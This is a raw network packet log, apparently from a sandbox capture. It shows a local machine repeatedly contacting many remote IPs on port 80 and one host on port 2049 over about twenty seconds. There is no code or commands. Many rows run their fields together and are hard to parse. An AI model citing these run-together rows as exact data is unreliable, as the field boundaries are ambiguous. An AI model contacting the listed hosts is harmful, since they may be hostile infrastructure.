Nov 5, 2024 17:04:13.194720984 CET | 80 | 59774 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:13.194803953 CET | 59774 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:13.194984913 CET | 59774 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:13.195009947 CET | 59774 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:13.200206041 CET | 80 | 59774 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:13.200253010 CET | 80 | 59774 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:13.429471016 CET | 80 | 59773 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:13.452344894 CET | 59773 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:13.457568884 CET | 80 | 59773 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:13.457632065 CET | 59773 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:13.473407030 CET | 59775 | 80 | 192.168.2.5 | 34.211.97.45
Nov 5, 2024 17:04:13.478837013 CET | 80 | 59775 | 34.211.97.45 | 192.168.2.5
Nov 5, 2024 17:04:13.478933096 CET | 59775 | 80 | 192.168.2.5 | 34.211.97.45
Nov 5, 2024 17:04:13.487149954 CET | 59775 | 80 | 192.168.2.5 | 34.211.97.45
Nov 5, 2024 17:04:13.487179041 CET | 59775 | 80 | 192.168.2.5 | 34.211.97.45
Nov 5, 2024 17:04:13.494791985 CET | 80 | 59775 | 34.211.97.45 | 192.168.2.5
Nov 5, 2024 17:04:13.494961977 CET | 80 | 59775 | 34.211.97.45 | 192.168.2.5
Nov 5, 2024 17:04:14.314207077 CET | 80 | 59775 | 34.211.97.45 | 192.168.2.5
Nov 5, 2024 17:04:14.321583033 CET | 59775 | 80 | 192.168.2.5 | 34.211.97.45
Nov 5, 2024 17:04:14.326739073 CET | 80 | 59775 | 34.211.97.45 | 192.168.2.5
Nov 5, 2024 17:04:14.326811075 CET | 59775 | 80 | 192.168.2.5 | 34.211.97.45
Nov 5, 2024 17:04:14.343970060 CET | 59776 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:14.350456953 CET | 80 | 59776 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:14.351087093 CET | 59776 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:14.351274014 CET | 59776 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:14.351294994 CET | 59776 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:14.356296062 CET | 80 | 59776 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:14.356336117 CET | 80 | 59776 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:14.644968033 CET | 80 | 59774 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:14.684412003 CET | 59774 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:14.690803051 CET | 80 | 59774 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:14.691078901 CET | 59774 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:15.057250977 CET | 59777 | 80 | 192.168.2.5 | 13.251.16.150
Nov 5, 2024 17:04:15.062057972 CET | 80 | 59777 | 13.251.16.150 | 192.168.2.5
Nov 5, 2024 17:04:15.062150955 CET | 59777 | 80 | 192.168.2.5 | 13.251.16.150
Nov 5, 2024 17:04:15.062376022 CET | 59777 | 80 | 192.168.2.5 | 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.062398911 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.067591906 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.067687035 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.799179077 CET805977647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.799537897 CET5977680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.807095051 CET805977647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.807161093 CET5977680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.833929062 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.839873075 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.840888977 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.842751980 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.847057104 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.847914934 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.852746010 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.928061962 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.933491945 CET204959779212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.933561087 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.934824944 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.940047026 CET204959779212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.421989918 CET204959779212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.422128916 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.422432899 CET597792049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.478646040 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.478848934 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.484327078 CET805977713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.486373901 CET5977780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.512398958 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.514504910 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.520297050 CET805977818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.520368099 CET5977880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.540669918 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546225071 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546415091 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546449900 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546497107 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.551422119 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.552228928 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.478135109 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.483028889 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.483113050 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.486206055 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.487410069 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.492235899 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.493477106 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.005286932 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.008389950 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.013843060 CET805978013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.013894081 CET5978080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.143543959 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.147769928 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.153407097 CET805978118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.153465033 CET5978180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.246767044 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252649069 CET805978234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252722025 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252860069 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252876997 CET5978280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.257807016 CET805978234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.257980108 CET805978234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.546075106 CET5978880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.824342012 CET805978918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.824915886 CET5978980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.830332041 CET805978918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.830655098 CET5978980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.840806007 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.845660925 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.847075939 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.847208023 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.847224951 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.852498055 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.852510929 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.875572920 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880464077 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880533934 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880805969 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880831003 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.885677099 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.885689974 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.684005976 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.684267998 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.689971924 CET805979018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.690119982 CET5979080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.707657099 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.712600946 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.714694977 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.716886997 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.716886997 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.721857071 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.721976042 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.848691940 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.848900080 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.854094982 CET80597913.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.856271029 CET5979180192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.182868004 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.187794924 CET805979318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.188004017 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.188321114 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.188321114 CET5979380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.193151951 CET805979318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.193166018 CET805979318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.368329048 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.368915081 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.374033928 CET805979244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.375611067 CET5979280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.557852983 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.562720060 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.562922001 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.563165903 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.563256979 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.568152905 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.568166971 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.399157047 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.402370930 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.408324003 CET805979454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.408377886 CET5979480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.421629906 CET5979580192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.435388088 CET80597953.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.435462952 CET5979580192.168.2.53.254.94.185
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 17:04:25.435960054 CET | 59795 | 80 | 192.168.2.5 | 3.254.94.185
Nov 5, 2024 17:04:25.435997963 CET | 59795 | 80 | 192.168.2.5 | 3.254.94.185
Nov 5, 2024 17:04:25.440850973 CET | 80 | 59795 | 3.254.94.185 | 192.168.2.5
Nov 5, 2024 17:04:25.440876961 CET | 80 | 59795 | 3.254.94.185 | 192.168.2.5
Nov 5, 2024 17:04:25.618566036 CET | 80 | 59793 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:25.619307041 CET | 59793 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:25.624577045 CET | 80 | 59793 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:25.624676943 CET | 59793 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:25.947505951 CET | 59796 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:25.952456951 CET | 80 | 59796 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:25.952593088 CET | 59796 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:25.953444958 CET | 59796 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:25.953444958 CET | 59796 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:25.958409071 CET | 80 | 59796 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:25.958421946 CET | 80 | 59796 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:26.437732935 CET | 80 | 59795 | 3.254.94.185 | 192.168.2.5
Nov 5, 2024 17:04:26.438198090 CET | 59795 | 80 | 192.168.2.5 | 3.254.94.185
Nov 5, 2024 17:04:26.443466902 CET | 80 | 59795 | 3.254.94.185 | 192.168.2.5
Nov 5, 2024 17:04:26.443566084 CET | 59795 | 80 | 192.168.2.5 | 3.254.94.185
Nov 5, 2024 17:04:26.456315994 CET | 59797 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:26.461265087 CET | 80 | 59797 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:26.463088036 CET | 59797 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:26.463238955 CET | 59797 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:26.463326931 CET | 59797 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:26.468128920 CET | 80 | 59797 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:26.468147039 CET | 80 | 59797 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:26.924432039 CET | 80 | 59796 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:26.926100016 CET | 59796 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:26.931385040 CET | 80 | 59796 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:26.934544086 CET | 59796 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:27.170593977 CET | 59798 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:27.175643921 CET | 2049 | 59798 | 212.162.149.53 | 192.168.2.5
Nov 5, 2024 17:04:27.175757885 CET | 59798 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:27.176235914 CET | 59798 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:27.181312084 CET | 2049 | 59798 | 212.162.149.53 | 192.168.2.5
Nov 5, 2024 17:04:27.302226067 CET | 59799 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:27.307250977 CET | 80 | 59799 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:27.307423115 CET | 59799 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:27.307653904 CET | 59799 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:27.307653904 CET | 59799 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:27.312778950 CET | 80 | 59799 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:27.312791109 CET | 80 | 59799 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:27.667201996 CET | 2049 | 59798 | 212.162.149.53 | 192.168.2.5
Nov 5, 2024 17:04:27.669596910 CET | 59798 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:27.669835091 CET | 59798 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:27.953032970 CET | 2049 | 59798 | 212.162.149.53 | 192.168.2.5
Nov 5, 2024 17:04:27.953049898 CET | 80 | 59797 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:27.957159996 CET | 59798 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:27.957319021 CET | 59797 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:27.962796926 CET | 80 | 59797 | 18.141.10.107 | 192.168.2.5
Nov 5, 2024 17:04:27.965434074 CET | 59797 | 80 | 192.168.2.5 | 18.141.10.107
Nov 5, 2024 17:04:27.975018024 CET | 59800 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:27.980003119 CET | 80 | 59800 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:27.981461048 CET | 59800 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:27.981580019 CET | 59800 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:27.981599092 CET | 59800 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:27.986608982 CET | 80 | 59800 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:27.986656904 CET | 80 | 59800 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:28.759972095 CET | 80 | 59799 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:28.760559082 CET | 59799 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:28.766355991 CET | 80 | 59799 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:28.767235994 CET | 59799 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:28.954812050 CET | 80 | 59800 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:28.955369949 CET | 59800 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:28.961020947 CET | 80 | 59800 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:28.961663008 CET | 59800 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:28.975114107 CET | 59801 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:28.980427027 CET | 80 | 59801 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:28.980489016 CET | 59801 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:28.980695009 CET | 59801 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:28.980775118 CET | 59801 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:28.985718012 CET | 80 | 59801 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:28.985765934 CET | 80 | 59801 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:28.995345116 CET | 59802 | 80 | 192.168.2.5 | 3.94.10.34
Nov 5, 2024 17:04:29.001543045 CET | 80 | 59802 | 3.94.10.34 | 192.168.2.5
Nov 5, 2024 17:04:29.001610041 CET | 59802 | 80 | 192.168.2.5 | 3.94.10.34
Nov 5, 2024 17:04:29.002130985 CET | 59802 | 80 | 192.168.2.5 | 3.94.10.34
Nov 5, 2024 17:04:29.002221107 CET | 59802 | 80 | 192.168.2.5 | 3.94.10.34
Nov 5, 2024 17:04:29.007877111 CET | 80 | 59802 | 3.94.10.34 | 192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.009131908 CET80598023.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.656167030 CET80598023.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.657282114 CET5980280192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.663253069 CET80598023.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.664879084 CET5980280192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.414443016 CET805980147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.417237043 CET5980180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.422497034 CET805980147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.426301956 CET5980180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.431216955 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.436077118 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.438474894 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.438586950 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.438606977 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.443406105 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.443464994 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.707884073 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.712747097 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.712850094 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.713051081 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.713088989 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.718105078 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.718169928 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.123630047 CET80598033.94.10.34192.168.2.5
